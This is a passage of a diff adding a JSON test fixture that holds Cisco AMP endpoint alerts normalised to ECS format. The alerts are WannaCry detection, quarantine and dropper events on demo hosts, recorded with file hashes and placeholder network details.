}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214500913742000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.24D004A104-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + 
"detection_id": "6419214500913741855", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094076786Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214500913742000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419214500913741857", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094078741Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214500913742000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.24D004A104-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419214500913741856", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + 
"Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094080611Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419214500913742000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": 
{} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419214500913741856", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:43:30.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094082470Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419214492323807000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419214488028839966", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 5580, + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "@timestamp": "2021-01-14T13:43:29.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", 
+ "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094084360Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419214488028840000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + 
"detection_id": "6419214488028839966", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:29:36.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:10.094086254Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper 
Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "start": "2021-01-14T13:29:36.000Z", + "action": "Potential Dropper Infection", + "id": "14945890085425", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296257 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:28:09.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:10.094088127Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6412574627503014000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": 
"Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094089991Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419204910251770000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + 
], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419204910251769881", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094091860Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419204910251770000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419204910251769885", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094093728Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat 